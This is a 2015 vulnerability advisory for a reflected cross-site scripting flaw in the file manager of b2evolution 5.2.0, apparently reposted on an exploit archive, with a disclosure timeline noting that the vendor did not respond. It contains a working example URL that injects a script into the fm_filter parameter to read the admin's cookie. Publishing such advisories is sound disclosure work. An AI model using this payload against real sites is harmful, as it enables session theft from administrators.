CMS b2evolution 5.2.0 Cross Site Scripting

CMS b2evolution 5.2.0 Cross Site Scripting: Posted Jan 14, 2015; Authored by Steffen Roesemann; CMS b2evolution version 5.2.0 suffers from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 4b95a602e4064b14c1925613d95f0cd6ab4878e0ce547bf1e2ca309b92c192e4; Download | Favorite | View

CMS b2evolution 5.2.0 Cross Site Scripting

Advisory: Reflecting XSS vulnerability in CMS filemanager of b2evolution v.
5.2.0
Advisory ID: SROEADV-2014-09
Author: Steffen Rösemann
Affected Software: CMS b2evolution v. 5.2.0 (Release-Date: 6th-Dec-2014)
Vendor URL: http://b2evolution.net/
Vendor Status: did not respond to issue
CVE-ID: -

==========================
Vulnerability Description:
==========================

The filemanager of b2evolution v. 5.2.0 is prone to reflecting XSS attacks.

==================
Technical Details:
==================

By appending aribitrary HTML- and/or JavaScriptcode to the "fm_filter"
parameter of the URL where the filemanager functionality of b2eveolution is
located, an attacker could trick an authenticated administrative user to
execute the code.

Filemanager is located here on a common b2evolution installation:

http://
{TARGET}/blogs/admin.php?fm_filter=&actionArray[filter]=Apply&ctrl=files&locale=&blog=1&mode=&ajax_request=0&root=collection_1&path=&fm_mode=&linkctrl=&linkdata=&iframe_name=&fm_hide_dirtree=0&fm_flatmode=&fm_order=&fm_orderasc=

Exploit-Example:

http://
{TARGET}/blogs/admin.php?fm_filter=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&actionArray[filter]=Apply&ctrl=files&locale=&blog=1&mode=&ajax_request=0&root=collection_1&path=&fm_mode=&linkctrl=&linkdata=&iframe_name=&fm_hide_dirtree=0&fm_flatmode=&fm_order=&fm_orderasc=

=========
Solution:
=========

Vendor did not respond and submitted no solution.

====================
Disclosure Timeline:
====================

30-Dec-2014 – found the vulnerability
30-Dec-2014 - informed the developers (incl. announcement to release
technical details on 13th Jan 2015 if there is no response)
30-Dec-2014 – release date of this security advisory [without technical
details]
13-Jan-2015 - vendor did not respond
13-Jan-2015 - release date of this security advisory
13-Jan-2015 - send to lists



========
Credits:
========

Vulnerability found and advisory written by Steffen Rösemann.

===========
References:
===========

[1] http://b2evolution.net/
[2] http://sroesemann.blogspot.de/2014/12/sroeadv-2014-09.html
[3]
http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2014-09.html

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

CMS b2evolution 5.2.0 Cross Site Scripting

CMS b2evolution 5.2.0 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

CMS b2evolution 5.2.0 Cross Site Scripting

Share This

CMS b2evolution 5.2.0 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems